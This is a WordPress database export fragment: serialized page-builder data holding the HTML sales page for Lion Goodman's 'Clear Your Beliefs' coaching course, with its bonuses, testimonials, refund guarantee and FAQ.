class="module_body">\n\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You’ll receive the first two chapters of the book as Bonus #4, below.\n\n</div>\n<div class="module_body">\n\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\n<div class="module_body">\n\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\n<ul style="padding-left: 20px;">\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\n	<li>Learn a process that can strengthen your power of intention</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Change Your Beliefs eBook</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a>\n\n</div>\n<div class="module_body">\n\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>” \n\nLion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior. \n\nIt’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\n\n</div>\n<div class="module_body"></div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\n\n</div>\n</div>\n&nbsp;\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.\n\n<em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\n\nYour coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\n\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they’ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n<a name="package"></a>\n<p style="text-align: right;"><a href="http://clearyourbeliefs.com/program/#top">Up To Top</a></p>\n&nbsp;\n<div class="icon_box" style="background: #EFF8FB; width: 500px; margin: 17px auto;">\n<h1>Purchase Today and You’ll Receive:</h1>\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world’s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\n<h3 style="font-size: 20px;">Plus: <em>The Entire BONUS Collection:</em></h3>\n<ul class="icon_box-ul">\n	<li><strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.</li>\n	<li><em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.</li>\n	<li>Your Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong></li>\n	<li><strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\n	<li>Multimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)</li>\n	<li><strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.</li>\n	<li><strong>Optional:</strong> Professional Coaching Sessions.</li>\n</ul>\n<div class="clear"></div>\n&nbsp;\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Select Your Plan</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n\n</div>\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>About Lion Goodman</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\n\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>\n\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\n\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\n\n&nbsp;\n\n&nbsp;\n<div class="icon_box">\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n<div class="quot">\n\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\n<div style="text-align: right; margin-right: 60px;"><strong>– G. J., software developer</strong></div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n</div>\n<div class="quot">\n\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ C.T., Performance and Life Coach</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>– M.M., International Business Consultant</strong></div>\n<div style="text-align: right;"></div>\n</div>\n&nbsp;\n\n</div>\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Select Your Plan</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>Frequently Asked Questions</h1>\n\n<div class="parg-text"><p><strong>Q: What is a virtual course?</strong></p>\n\n<div class="parg-text"><p>A: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.</p>\n\n<div class="parg-text"><p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p>\n\n<div class="parg-text"><p><strong>Q: How long will I have access to the course?</strong></p>\n\n<div class="parg-text"><p>A: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p>\n\n<div class="parg-text"><p><strong>Q: Are there scholarships available?</strong></p>\n\n<div class="parg-text"><p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to <a href="mailto:info@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">info@clearyourbeliefs.com</a></font>, with a description of your circumstances and your offer of what you can pay.</p>\n\n<div class="parg-text"><p><strong>Q: What is your refund policy?</strong></p>\n\n<div class="parg-text"><p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">support@clearyourbeliefs.com</a></font>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p>\n\n<div class="parg-text"><p><strong>Q: How can I reach Customer Support?</strong></p>\n\n<div class="parg-text"><p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">support@clearyourbeliefs.com</a></font>. We’ll get back to you within 48 hours (sometimes longer over weekends).</p>\n\n<div class="parg-text"><p><strong>Q: What is your Privacy Policy?</strong></p>\n\n<div class="parg-text"><p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank" ><FONT COLOR="#2E2EFE">ClearYourBeliefs.com</a></font>, <a href="http://www.BeliefCloset.com" target="_blank" ><FONT COLOR="#2E2EFE">BeliefCloset.com</a></font>, or <a href="http://www.ConfusedAboutLove.com" target="_blank" ><FONT COLOR="#2E2EFE">ConfusedAboutLove.com.</a></font></p>\n\n<div class="parg-text"><p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p>\n\n<div class="parg-text"><p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p>\n\n<script>// <![CDATA[\njQuery(document).ready(function() {  var is_chrome = window.chrome;   if (is_chrome) {  jQuery(''h5.hdr'').css(''text-size'', ''51px!important'');  jQuery(''h5.hdr'').animate({     fontSize: ''51px''  }, 100);  }  });\n// ]]></script>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"20";s:4:"cell";s:1:"0";s:2:"id";s:2:"26";s:5:"class";s:14:"WP_Widget_Text";}}}s:5:"grids";a:21:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"3";}i:2;a:1:{s:5:"cells";s:1:"1";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"2";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"3";}i:7;a:1:{s:5:"cells";s:1:"1";}i:8;a:1:{s:5:"cells";s:1:"1";}i:9;a:1:{s:5:"cells";s:1:"1";}i:10;a:1:{s:5:"cells";s:1:"1";}i:11;a:1:{s:5:"cells";s:1:"2";}i:12;a:1:{s:5:"cells";s:1:"1";}i:13;a:1:{s:5:"cells";s:1:"1";}i:14;a:1:{s:5:"cells";s:1:"1";}i:15;a:1:{s:5:"cells";s:1:"1";}i:16;a:1:{s:5:"cells";s:1:"1";}i:17;a:1:{s:5:"cells";s:1:"1";}i:18;a:1:{s:5:"cells";s:1:"1";}i:19;a:1:{s:5:"cells";s:1:"1";}i:20;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:27:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:19:"0.20075282308657466";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.5984943538268507";s:4:"grid";s:1:"1";}i:3;a:2:{s:6:"weight";s:19:"0.20075282308657466";s:4:"grid";s:1:"1";}i:4;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:1:"4";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:9;a:2:{s:6:"weight";s:19:"0.05018820577164367";s:4:"grid";s:1:"6";}i:10;a:2:{s:6:"weight";s:18:"0.8996235884567128";s:4:"grid";s:1:"6";}i:11;a:2:{s:6:"weight";s:19:"0.05018820577164367";s:4:"grid";s:1:"6";}i:12;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}i:13;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"8";}i:14;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"9";}i:15;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"10";}i:16;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:2:"11";}i:17;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:2:"11";}i:18;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"12";}i:19;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"13";}i:20;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"14";}i:21;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"15";}i:22;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"16";}i:23;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"17";}i:24;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"18";}i:25;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"19";}i:26;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"20";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1619, 2050, 'panels_data', 'a:3:{s:7:"widgets";a:27:{i:0;a:4:{s:5:"title";s:0:"";s:4:"text";s:137:"<div class="top-img"> <img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg"> </div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:14:"WP_Widget_Text";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:650:"<div class="quot custo-quot" style="margin-top: 0px; text-align: center;">\n<img class="bor-img-top no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong></span>\n<img class="bor-img-bot no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"1";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:5:"title";s:0:"";s:4:"text";s:95:"<div class="parg-title"><h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:14:"WP_Widget_Text";}}i:3;a:4:{s:5:"title";s:0:"";s:4:"text";s:483:"<div class="parg-text"><p>You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.</p>\n\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"3";s:5:"class";s:14:"WP_Widget_Text";}}i:4;a:4:{s:5:"title";s:0:"";s:4:"text";s:183:"<div class="parg-img"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"1";s:2:"id";s:1:"4";s:5:"class";s:14:"WP_Widget_Text";}}i:5;a:4:{s:5:"title";s:0:"";s:4:"text";s:132:"<div class="parg-title"><h1>\nWhat If You Could Permanently Delete Old Habits And Patterns – So They Didn’t Come Back?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:14:"WP_Widget_Text";}}i:6;a:4:{s:5:"title";s:0:"";s:4:"text";s:322:"<div class="parg-text"><p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:14:"WP_Widget_Text";}}i:7;a:4:{s:5:"title";s:0:"";s:4:"text";s:277:"<div class="parg-text"><p><strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You’re still not taking consistent actions to reach your goals or change your life.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:14:"WP_Widget_Text";}}i:8;a:4:{s:5:"title";s:16:"Ok I''m convinced";s:4:"text";s:238:"<center><a class="button first" href="http://clearyourbeliefs.com/program/#package">OK, I''M CONVINCED!<br />Take me to the program description,<br />tell me about all the cool bonuses I’ll get,<br />and how much it costs...</a></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"1";s:2:"id";s:1:"8";s:5:"class";s:14:"WP_Widget_Text";}}i:9;a:4:{s:5:"title";s:0:"";s:4:"text";s:61:"<div class="parg-title"><h1>\nWhy Does This Happen?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"8";s:4:"cell";s:1:"0";s:2:"id";s:1:"9";s:5:"class";s:14:"WP_Widget_Text";}}i:10;a:4:{s:5:"title";s:0:"";s:4:"text";s:833:"<div class="parg-img pull-left"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /><p class="parg-text">Have you heard the myth, “It takes 30 days to change a habit?” It’s not true. Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p><p class="parg-text">Neuroscientists call the brain’s ability to change over time “neuroplasticity.”</p><p class="parg-text">It can take months – or years – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"8";s:4:"cell";s:1:"0";s:2:"id";s:2:"10";s:5:"class";s:14:"WP_Widget_Text";}}i:11;a:4:{s:5:"title";s:0:"";s:4:"text";s:97:"<div class="parg-title"><h1>To Make Real Change, You Have To Get To The Root of Things</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"10";s:4:"cell";s:1:"0";s:2:"id";s:2:"11";s:5:"class";s:14:"WP_Widget_Text";}}i:12;a:4:{s:5:"title";s:0:"";s:4:"text";s:302:"<div class="parg-text"><p>The best doctors seek the source the source of the dis-ease. They don’t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don’t solve the cause of the problem – where the illness is being generated.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"10";s:4:"cell";s:1:"0";s:2:"id";s:2:"12";s:5:"class";s:14:"WP_Widget_Text";}}i:13;a:4:{s:5:"title";s:0:"";s:4:"text";s:225:"<div class="parg-text"><p>If you don’t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"11";s:4:"cell";s:1:"0";s:2:"id";s:2:"13";s:5:"class";s:14:"WP_Widget_Text";}}i:14;a:3:{s:3:"src";s:74:"http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg";s:4:"href";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"11";s:4:"cell";s:1:"1";s:2:"id";s:2:"14";s:5:"class";s:31:"SiteOrigin_Panels_Widgets_Image";}}i:15;a:4:{s:5:"title";s:0:"";s:4:"text";s:84:"<div class="parg-title"><h1>Beliefs Are The Foundation Of Your 